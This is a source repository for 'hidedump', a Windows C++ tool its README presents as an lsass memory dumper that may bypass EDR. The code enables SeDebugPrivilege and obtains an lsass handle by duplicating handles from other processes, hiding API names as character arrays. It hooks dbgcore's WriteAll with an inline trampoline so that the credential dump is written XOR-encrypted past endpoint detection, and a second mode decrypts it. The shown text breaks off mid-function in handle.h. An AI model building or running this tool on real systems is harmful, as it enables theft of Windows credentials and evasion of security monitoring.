├── 1.png
├── utils.h
├── hidedump.vcxproj.user
├── README.md
├── hidedump.vcxproj.filters
├── hidedump.sln
├── utils.cpp
├── hidedump.cpp
├── hidedump.vcxproj
└── handle.h


/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/coleak2021/hidedump/HEAD/1.png


--------------------------------------------------------------------------------
/utils.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | unsigned char* encrypt(void* buffer, long long size);
3 | bool IsElevated();
4 | bool SetDebugPrivilege();


--------------------------------------------------------------------------------
/hidedump.vcxproj.user:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 4 |     <LocalDebuggerCommandArguments>
 5 |     </LocalDebuggerCommandArguments>
 6 |     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
 7 |   </PropertyGroup>
 8 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 9 |     <LocalDebuggerCommandArguments>1 a.bin</LocalDebuggerCommandArguments>
10 |     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
11 |   </PropertyGroup>
12 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | **Introduction**
 2 | 
 3 | ```
 4 | Hidedump:a lsassdump tools that may bypass EDR
 5 | achieve：hook WriteAll+duplication
 6 | ```
 7 | 
 8 | 
 9 | 
10 | **Use**
11 | 
12 | ```
13 | hidedump.exe [opt] filename
14 | opt==1:save the Encrypted dumpfile
15 | opt==2:Decrypt the dumpfile and save the decrypted file as sec.dump
16 | 
17 | example
18 | hidedump.exe 1 tmp.bin
19 | hidedump.exe 2 tmp.bin
20 | ```
21 | 
22 | ![1](1.png)
23 | 
24 | 
25 | 
26 | **More information**
27 | 
28 | ```
29 | https://mp.weixin.qq.com/s?__biz=MzkyNTUyNDMyOA==&mid=2247487133&idx=1&sn=814bb99d366f7db1d19c6ab8d72731cb&chksm=c1c4069af6b38f8c767ee8b499680de41ab2ce407eb1283b360b61960ba3c30b263c246e91ec#rd
30 | ```
31 | 
32 | 
33 | 
34 | **tip**
35 | 
36 | The project is no longer update for bypass, only to provide you with ideas
37 | 


--------------------------------------------------------------------------------
/hidedump.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="源文件">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="头文件">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="资源文件">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="hidedump.cpp">
19 |       <Filter>源文件</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="utils.cpp">
22 |       <Filter>源文件</Filter>
23 |     </ClCompile>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClInclude Include="utils.h">
27 |       <Filter>头文件</Filter>
28 |     </ClInclude>
29 |     <ClInclude Include="handle.h">
30 |       <Filter>头文件</Filter>
31 |     </ClInclude>
32 |   </ItemGroup>
33 | </Project>


--------------------------------------------------------------------------------
/hidedump.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.9.34622.214
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hidedump", "hidedump.vcxproj", "{581CAD97-34F6-4047-A756-0AB431F2C94C}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{581CAD97-34F6-4047-A756-0AB431F2C94C}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{581CAD97-34F6-4047-A756-0AB431F2C94C}.Debug|x64.Build.0 = Debug|x64
18 | 		{581CAD97-34F6-4047-A756-0AB431F2C94C}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{581CAD97-34F6-4047-A756-0AB431F2C94C}.Debug|x86.Build.0 = Debug|Win32
20 | 		{581CAD97-34F6-4047-A756-0AB431F2C94C}.Release|x64.ActiveCfg = Release|x64
21 | 		{581CAD97-34F6-4047-A756-0AB431F2C94C}.Release|x64.Build.0 = Release|x64
22 | 		{581CAD97-34F6-4047-A756-0AB431F2C94C}.Release|x86.ActiveCfg = Release|Win32
23 | 		{581CAD97-34F6-4047-A756-0AB431F2C94C}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {815B6A6E-1F4C-4DB9-BC73-4B3EB5DF2EB9}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/utils.cpp:
--------------------------------------------------------------------------------
 1 | #include "utils.h"
 2 | #include <stdio.h>
 3 | #include <Windows.h>
 4 | unsigned char* encrypt(void* buffer, long long size) {
 5 |     unsigned char* new_buff = (unsigned char*)malloc(size);
 6 |     SecureZeroMemory(new_buff, size);
 7 |     for (long long i = 0; i < size; ++i) {
 8 |         new_buff[i] = *(((unsigned char*)buffer) + i) ^ 0x6b;
 9 |     }
10 |     return new_buff;
11 | }
12 | bool IsElevated() {
13 |     BOOL fRet = FALSE;
14 |     HANDLE hToken = NULL;
15 |     if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
16 |         TOKEN_ELEVATION Elevation = { 0 };
17 |         DWORD cbSize = sizeof(TOKEN_ELEVATION);
18 |         if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
19 |             fRet = Elevation.TokenIsElevated;
20 |         }
21 |     }
22 |     if (hToken) {
23 |         CloseHandle(hToken);
24 |     }
25 |     return fRet;
26 | }
27 | bool SetDebugPrivilege() {
28 |     HANDLE hToken = NULL;
29 |     TOKEN_PRIVILEGES TokenPrivileges = { 0 };
30 | 
31 |     if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
32 |         return FALSE;
33 |     }
34 |     TokenPrivileges.PrivilegeCount = 1;
35 |     TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
36 |     const wchar_t* lpwPriv = L"SeDebugPrivilege";
37 |     if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
38 |         CloseHandle(hToken);
39 |         return FALSE;
40 |     }
41 |     if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
42 |         CloseHandle(hToken);
43 |         return FALSE;
44 |     }
45 |     CloseHandle(hToken);
46 |     return TRUE;
47 | }
48 | 


--------------------------------------------------------------------------------
/hidedump.cpp:
--------------------------------------------------------------------------------
  1 | #include "utils.h"
  2 | #include "handle.h"
  3 | #include <Windows.h>
  4 | #include <stdio.h>
  5 | #include <DbgHelp.h>
  6 | #include<tlhelp32.h>
  7 | #include<iostream>
  8 | using namespace std;
  9 | #pragma comment (lib, "Dbghelp.lib")
 10 | char* writeAll_abs;
 11 | HANDLE hProcess;
 12 | HANDLE our_dmp_handle;
 13 | int key = 66;
 14 | int opt;
 15 | char* EXPORT_PATH;
 16 | char overwritten_writeAll[13];
 17 | char trampoline_assembly[13] = {
 18 |     0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,         // mov r10, NEW_LOC_@ddress
 19 |     0x41, 0xFF, 0xE2                                                    // jmp r10
 20 | };
 21 | void minidumpThis(HANDLE hProc)
 22 | {
 23 |     our_dmp_handle = CreateFileA(EXPORT_PATH, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
 24 |     if (!our_dmp_handle)
 25 |     {
 26 |         printf("No dump for you. Wrong file\n");
 27 |     }
 28 |     else
 29 |     {
 30 |         DWORD lsassPid = GetProcessId(hProc);
 31 |         BOOL Result = MiniDumpWriteDump(hProc, lsassPid, our_dmp_handle, MiniDumpWithFullMemory, NULL, NULL, NULL);
 32 |         CloseHandle(our_dmp_handle);
 33 |         if (!Result)
 34 |         {
 35 |             printf("No dump for you. Minidump failed\n");
 36 |         }
 37 |     }
 38 |     return;
 39 | }
 40 | unsigned char* hoot(void* buffer, INT64 size, long pos) {
 41 |     unsigned char* new_buff = (unsigned char*)buffer;
 42 |     new_buff = encrypt(buffer, size);
 43 |     return new_buff;
 44 | }
 45 | 
 46 | UINT32 _hoot_trampoline(HANDLE file_handler, void* buffer, INT64 size) {
 47 |     WriteProcessMemory(hProcess, (LPVOID*)writeAll_abs, &overwritten_writeAll, sizeof(overwritten_writeAll), NULL);
 48 | 
 49 |     long high_dword = NULL;
 50 |     DWORD low_dword = SetFilePointer(our_dmp_handle, NULL, &high_dword, FILE_CURRENT);
 51 |     long pos = high_dword << 32 | low_dword;
 52 | 
 53 |     unsigned char* new_buff = hoot(buffer, size, pos);
 54 | 
 55 |     UINT32 ret = ((UINT32(*)(HANDLE, void*, INT64))(writeAll_abs))(file_handler, (void*)new_buff, size);      // erg...
 56 |     free(new_buff);
 57 |     WriteProcessMemory(hProcess, (LPVOID*)writeAll_abs, &trampoline_assembly, sizeof(trampoline_assembly), NULL);
 58 | 
 59 |     return ret;
 60 | }
 61 | 
 62 | bool parse_args(int argc, char* args[]) {
 63 |     bool success = false;
 64 |     if (argc == 3) {
 65 |         opt = atoi(args[1]);
 66 |         EXPORT_PATH = args[2];
 67 |         success = true;
 68 |     }
 69 |     return success;
 70 | }
 71 | int main(int argc, char* args[])
 72 | {
 73 |     srand(key);
 74 |     if (!parse_args(argc, args))
 75 |         return -1;
 76 |     if (opt == 1)
 77 |     {
 78 |         if (!IsElevated()) {
 79 |             printf("not admin\n");
 80 |             return -1;
 81 |         }
 82 |         if (!SetDebugPrivilege()) {
 83 |             printf("no SeDebugPrivs\n");
 84 |             return -1;
 85 |         }
 86 |         hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId());
 87 |         const char* dbgcore_name = "dbgcore.dll";
 88 |         HINSTANCE  dbgcore_handle = LoadLibraryA(dbgcore_name);
 89 |         WORD writeAll_offset = 0xE430;
 90 |         writeAll_abs =(char*)dbgcore_handle + writeAll_offset;
 91 |         void* _hoot_trampoline_address = (void*)_hoot_trampoline;
 92 |         memcpy(&trampoline_assembly[2], &_hoot_trampoline_address, sizeof(_hoot_trampoline_address));
 93 |         memcpy(overwritten_writeAll, (void*)writeAll_abs, sizeof(overwritten_writeAll));
 94 |         WriteProcessMemory(hProcess, (LPVOID*)writeAll_abs, &trampoline_assembly, sizeof(trampoline_assembly), NULL);
 95 |         HANDLE lsassProcess_handle = NULL;
 96 |         lsassProcess_handle= enum_lsass_handles();
 97 |         minidumpThis(lsassProcess_handle);
 98 |         CloseHandle(lsassProcess_handle);
 99 |         CloseHandle(hProcess);
100 |     }
101 |     else if (opt == 2) {
102 |         HANDLE file = CreateFileA(EXPORT_PATH, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
103 |         long long size = GetFileSize(file, NULL);
104 |         unsigned char* bytes = (unsigned char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size);
105 |         ReadFile(file, (LPVOID)bytes,(DWORD) size, NULL, NULL);
106 |         bytes = encrypt(bytes, size);
107 |         HANDLE file2 = CreateFileA((LPCSTR)"sec.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
108 |         if (!WriteFile(file2, bytes, size, NULL, NULL)) {
109 |             cout << "Error writing to file" << endl;
110 |             return 1;
111 |         }
112 |         CloseHandle(file2);
113 |         CloseHandle(file);
114 |     }
115 |     else {
116 |         cout << "erro args" << endl;
117 |     }
118 |     return 0;
119 | }
120 | 


--------------------------------------------------------------------------------
/hidedump.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{581cad97-34f6-4047-a756-0ab431f2c94c}</ProjectGuid>
 25 |     <RootNamespace>hidedump</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 74 |     <GenerateManifest>false</GenerateManifest>
 75 |   </PropertyGroup>
 76 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 77 |     <ClCompile>
 78 |       <WarningLevel>Level3</WarningLevel>
 79 |       <SDLCheck>true</SDLCheck>
 80 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 81 |       <ConformanceMode>true</ConformanceMode>
 82 |     </ClCompile>
 83 |     <Link>
 84 |       <SubSystem>Console</SubSystem>
 85 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 86 |     </Link>
 87 |   </ItemDefinitionGroup>
 88 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 89 |     <ClCompile>
 90 |       <WarningLevel>Level3</WarningLevel>
 91 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 92 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 93 |       <SDLCheck>true</SDLCheck>
 94 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 95 |       <ConformanceMode>true</ConformanceMode>
 96 |     </ClCompile>
 97 |     <Link>
 98 |       <SubSystem>Console</SubSystem>
 99 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
100 |       <OptimizeReferences>true</OptimizeReferences>
101 |       <GenerateDebugInformation>true</GenerateDebugInformation>
102 |     </Link>
103 |   </ItemDefinitionGroup>
104 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
105 |     <ClCompile>
106 |       <WarningLevel>Level3</WarningLevel>
107 |       <SDLCheck>true</SDLCheck>
108 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
109 |       <ConformanceMode>true</ConformanceMode>
110 |       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
111 |     </ClCompile>
112 |     <Link>
113 |       <SubSystem>Console</SubSystem>
114 |       <GenerateDebugInformation>false</GenerateDebugInformation>
115 |       <UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
116 |     </Link>
117 |   </ItemDefinitionGroup>
118 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
119 |     <ClCompile>
120 |       <WarningLevel>Level3</WarningLevel>
121 |       <FunctionLevelLinking>true</FunctionLevelLinking>
122 |       <IntrinsicFunctions>true</IntrinsicFunctions>
123 |       <SDLCheck>true</SDLCheck>
124 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
125 |       <ConformanceMode>true</ConformanceMode>
126 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
127 |     </ClCompile>
128 |     <Link>
129 |       <SubSystem>Console</SubSystem>
130 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
131 |       <OptimizeReferences>true</OptimizeReferences>
132 |       <GenerateDebugInformation>false</GenerateDebugInformation>
133 |     </Link>
134 |   </ItemDefinitionGroup>
135 |   <ItemGroup>
136 |     <ClCompile Include="hidedump.cpp" />
137 |     <ClCompile Include="utils.cpp" />
138 |   </ItemGroup>
139 |   <ItemGroup>
140 |     <ClInclude Include="handle.h" />
141 |     <ClInclude Include="utils.h" />
142 |   </ItemGroup>
143 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
144 |   <ImportGroup Label="ExtensionTargets">
145 |   </ImportGroup>
146 | </Project>


--------------------------------------------------------------------------------
/handle.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include <windows.h>
  3 | #include <stdio.h>
  4 | #include <wchar.h>
  5 | #define NT_SUCCESS(x) ((x) >= 0)
  6 | #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
  7 | 
  8 | #define SystemHandleInformation 16
  9 | #define ObjectBasicInformation 0
 10 | #define ObjectNameInformation 1
 11 | #define ObjectTypeInformation 2
 12 | 
 13 | typedef HANDLE(NTAPI* _NtOpenProcess)(
 14 |     DWORD dwDesiredAccess,
 15 |     BOOL  bInheritHandle,
 16 |     DWORD dwProcessId
 17 |     );
 18 | 
 19 | typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
 20 |     ULONG SystemInformationClass,
 21 |     PVOID SystemInformation,
 22 |     ULONG SystemInformationLength,
 23 |     PULONG ReturnLength
 24 |     );
 25 | typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
 26 |     HANDLE SourceProcessHandle,
 27 |     HANDLE SourceHandle,
 28 |     HANDLE TargetProcessHandle,
 29 |     PHANDLE TargetHandle,
 30 |     ACCESS_MASK DesiredAccess,
 31 |     ULONG Attributes,
 32 |     ULONG Options
 33 |     );
 34 | typedef NTSTATUS(NTAPI* _NtQueryObject)(
 35 |     HANDLE ObjectHandle,
 36 |     ULONG ObjectInformationClass,
 37 |     PVOID ObjectInformation,
 38 |     ULONG ObjectInformationLength,
 39 |     PULONG ReturnLength
 40 |     );
 41 | 
 42 | typedef BOOL(NTAPI* _NtQueryFullProcessImageNameW)(
 43 |     HANDLE hProcess,
 44 |     DWORD  dwFlags,
 45 |     LPWSTR lpExeName,
 46 |     PDWORD lpdwSize
 47 |     );
 48 | 
 49 | typedef struct _UNICODE_STRING {
 50 |     USHORT Length;
 51 |     USHORT MaximumLength;
 52 |     PWSTR Buffer;
 53 | } UNICODE_STRING, * PUNICODE_STRING;
 54 | 
 55 | typedef struct _SYSTEM_HANDLE {
 56 |     ULONG ProcessId;
 57 |     BYTE ObjectTypeNumber;
 58 |     BYTE Flags;
 59 |     USHORT Handle;
 60 |     PVOID Object;
 61 |     ACCESS_MASK GrantedAccess;
 62 | } SYSTEM_HANDLE, * PSYSTEM_HANDLE;
 63 | 
 64 | typedef struct _SYSTEM_HANDLE_INFORMATION {
 65 |     ULONG HandleCount;
 66 |     SYSTEM_HANDLE Handles[1];
 67 | } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
 68 | 
 69 | typedef enum _POOL_TYPE {
 70 |     NonPagedPool,
 71 |     PagedPool,
 72 |     NonPagedPoolMustSucceed,
 73 |     DontUseThisType,
 74 |     NonPagedPoolCacheAligned,
 75 |     PagedPoolCacheAligned,
 76 |     NonPagedPoolCacheAlignedMustS
 77 | } POOL_TYPE, * PPOOL_TYPE;
 78 | 
 79 | typedef struct _OBJECT_TYPE_INFORMATION {
 80 |     UNICODE_STRING Name;
 81 |     ULONG TotalNumberOfObjects;
 82 |     ULONG TotalNumberOfHandles;
 83 |     ULONG TotalPagedPoolUsage;
 84 |     ULONG TotalNonPagedPoolUsage;
 85 |     ULONG TotalNamePoolUsage;
 86 |     ULONG TotalHandleTableUsage;
 87 |     ULONG HighWaterNumberOfObjects;
 88 |     ULONG HighWaterNumberOfHandles;
 89 |     ULONG HighWaterPagedPoolUsage;
 90 |     ULONG HighWaterNonPagedPoolUsage;
 91 |     ULONG HighWaterNamePoolUsage;
 92 |     ULONG HighWaterHandleTableUsage;
 93 |     ULONG InvalidAttributes;
 94 |     GENERIC_MAPPING GenericMapping;
 95 |     ULONG ValidAccess;
 96 |     BOOLEAN SecurityRequired;
 97 |     BOOLEAN MaintainHandleCount;
 98 |     USHORT MaintainTypeList;
 99 |     POOL_TYPE PoolType;
100 |     ULONG PagedPoolUsage;
101 |     ULONG NonPagedPoolUsage;
102 | } OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;
103 | 
104 | PVOID GetLibraryProcAddress(const char* LibraryName, const char* ProcName) {
105 |     return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
106 | }
107 | 
108 | HANDLE enum_lsass_handles() {
109 |     char ntdll[] = { 'n','t','d','l','l','.','d','l','l',0 };
110 |     char kernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l',0 };
111 |     char qsysinfo[] = { 'N','t','Q','u','e','r','y','S','y','s','t','e','m','I','n','f','o','r','m','a','t','i','o','n',0 };
112 |     char dupo[] = { 'N','t','D','u','p','l','i','c','a','t','e','O','b','j','e','c','t',0 };
113 |     char qo[] = { 'N','t','Q','u','e','r','y','O','b','j','e','c','t',0 };
114 |     char qfpi[] = { 'Q','u','e','r','y','F','u','l','l','P','r','o','c','e','s','s','I','m','a','g','e','N','a','m','e','W',0 };
115 |     char op[] = { 'O','p','e','n','P','r','o','c','e','s','s',0 };
116 | 
117 |     _NtQuerySystemInformation ffNtQuery_SystemInformation = (_NtQuerySystemInformation)GetLibraryProcAddress(ntdll, qsysinfo);
118 |     _NtDuplicateObject ffNtDuplicate_Object = (_NtDuplicateObject)GetLibraryProcAddress(ntdll, dupo);
119 |     _NtQueryObject ffNtQuery_Object = (_NtQueryObject)GetLibraryProcAddress(ntdll, qo);
120 |     _NtQueryFullProcessImageNameW ffNtQuery_FullProcessImageNameW = (_NtQueryFullProcessImageNameW)GetLibraryProcAddress(kernel32, qfpi);
121 |     _NtOpenProcess ffNtOpen_Process = (_NtOpenProcess)GetLibraryProcAddress(kernel32, op);
122 | 
123 |     NTSTATUS status;
124 |     PSYSTEM_HANDLE_INFORMATION handleInfo;
125 |     ULONG handleInfoSize = 0x10000;
126 |     ULONG pid;
127 |     HANDLE processHandle;
128 |     ULONG i;
129 |     HANDLE lsass_handles = NULL;
130 | 
131 |     handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
132 | 
133 |     // NtQuerySystemInformation won't give us the correct buffer size,
134 |     //  so we guess by doubling the buffer size.
135 |     while ((status = ffNtQuery_SystemInformation(
136 |         SystemHandleInformation,
137 |         handleInfo,
138 |         handleInfoSize,
139 |         NULL
140 |     )) == STATUS_INFO_LENGTH_MISMATCH)
141 |         handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
142 | 
143 |     // NtQuerySystemInformation stopped giving us STATUS_INFO_LENGTH_MISMATCH.
144 |     if (!NT_SUCCESS(status)) {
145 |         printf("NtQuerySystemInformation failed!\n");
146 |         HANDLE tmp = NULL;
147 |         return tmp;
148 |     }
149 | 
150 |     for (i = 0; i < handleInfo->HandleCount; i++) {
151 |         SYSTEM_HANDLE handle = handleInfo->Handles[i];
152 |         HANDLE dupHandle = NULL;
153 |         POBJECT_TYPE_INFORMATION objectTypeInfo;
154 |         PVOID objectNameInfo;
155 |         UNICODE_STRING objectName;
156 |         ULONG returnLength;
157 | 
158 |         // Check if PID belongs to System
159 |         if (handle.ProcessId == 4)
160 |             continue;
161 | 
162 |         processHandle = ffNtOpen_Process(PROCESS_DUP_HANDLE, FALSE, handle.ProcessId);
163 | 
164 |         // Duplicate the handle so we can query it.
165 |         if (!NT_SUCCESS(ffNtDuplicate_Object(
166 |             processHandle,
167 |             (void*)handle.Handle,
168 |             GetCurrentProcess(),
169 |             &dupHandle,
170 |             PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
171 |             0,
172 |             0
173 |         ))) {
174 |             continue;
175 |         }
176 | 
177 | 
178 |         // Query the object type.
179 |         objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
180 |         if (!NT_SUCCESS(ffNtQuery_Object(
181 |             dupHandle,
182 |             ObjectTypeInformation,
183 |             objectTypeInfo,
184 |             0x1000,
185 |             NULL
186 |         ))) {
187 |             continue;
188 |         }
189 | 
190 |         UNICODE_STRING objectType = *(PUNICODE_STRING)objectTypeInfo;
191 | 
192 |         wchar_t path[MAX_PATH];
193 |         DWORD maxPath = MAX_PATH;
194 | 
195 |         if (wcsstr(objectType.Buffer, L"Process") != NULL)
196 |         {
197 |             // Print handle, type and its PID
198 |             ffNtQuery_FullProcessImageNameW(dupHandle, 0, path, &maxPath);
199 |             if (wcsstr(path, L"lsass.exe") != NULL) {
200 |                 lsass_handles = dupHandle;
